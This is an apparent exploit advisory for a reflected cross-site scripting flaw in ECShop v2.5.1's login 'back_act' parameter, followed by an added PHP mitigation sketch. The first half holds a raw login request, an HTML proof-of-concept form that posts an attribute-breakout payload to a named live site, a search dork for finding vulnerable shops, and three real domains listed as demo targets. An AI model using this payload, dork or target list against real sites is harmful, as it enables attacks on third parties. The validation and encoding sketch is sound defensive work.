
ECShop v2.5.1 Cross site scripting

Author: JoKeR_StEx, Published: 26-02-2014
#####################################################
# Exploit Title : ECShop v2.5.1 Cross site scripting
# Author : JoKeR_StEx
# Date : 24/02/2014
# Vendor Homepage : http://www.ecshop.com/
#####################################################

Host: www.t4u.com.tw
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.t4u.com.tw/shop/user.php
Cookie: ECS_ID=293af685d8c86d05f305ce26dfa58bb600693873; ECS[visit_times]=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
==============================================================================
username=user&password=user&act=act_login&back_act=[XSS]

[+] P.O.C :

<html>
<form action="http://www.newflavor.fr/user.php" method="POST">
<input type="hidden" name="back_act" value='"><center><h1>JoKeR_StEx</h1></center>'>
<input type="submit" name="xss" value="xss">
</form>
</html>
<!--
# Google Dork : intext:"powered by ECShop v2.5.1"
[+] Demo :
http://www.t4u.com.tw/shop/user.php
http://www.zhonghuarui.com.cn/en/user.php
http://www.piacejewellery.com/user.php
-->
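
Mitigation sketch for the reflected `back_act` parameter, added here as an example; it is not ECShop source code and not part of the original advisory. It assumes `back_act` is a post-login return path that the login page echoes into an HTML attribute (the `">` prefix of the PoC value suggests an attribute breakout); the function names and the `./index.php` fallback are hypothetical.

```php
<?php
// Added example, not ECShop code. Assumption: back_act is a return path
// that user.php writes back into value="..." of a hidden form field.

/** Accept only a same-site relative path; otherwise use a fixed default. */
function safe_back_act(string $raw, string $default = './index.php'): string
{
    // Reject empty input, control characters, markup delimiters, quotes
    // and backslashes before any further parsing.
    if ($raw === '' || preg_match('/[\x00-\x1f\x7f<>"\'\\\\]/', $raw)) {
        return $default;
    }
    $parts = parse_url($raw);
    // false = malformed. A scheme or host means the value leaves the site
    // (http://..., //host/..., javascript:, data:).
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $default;
    }
    return $raw;
}

/** Encode for an HTML attribute context, covering both quote styles. */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: the PoC value shown on this page, a benign return
// path, and an off-site value.
$samples = [
    '"><center><h1>JoKeR_StEx</h1></center>',
    'user.php?act=order_list',
    '//example.invalid/landing',
];

foreach ($samples as $raw) {
    // Vulnerable pattern: writing $raw straight into value="...".
    // Hardened pattern: validate on input, encode at the point of output.
    $field = sprintf(
        '<input type="hidden" name="back_act" value="%s">',
        attr(safe_back_act($raw))
    );
    echo $field, PHP_EOL;
    // Encoding alone already keeps the value inside the attribute:
    echo 'encoded only: ', attr($raw), PHP_EOL, PHP_EOL;
}
```

Validation and encoding are applied separately on purpose: validation limits where the post-login redirect can go, while encoding at output keeps any value that is ever reflected from breaking out of the attribute.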
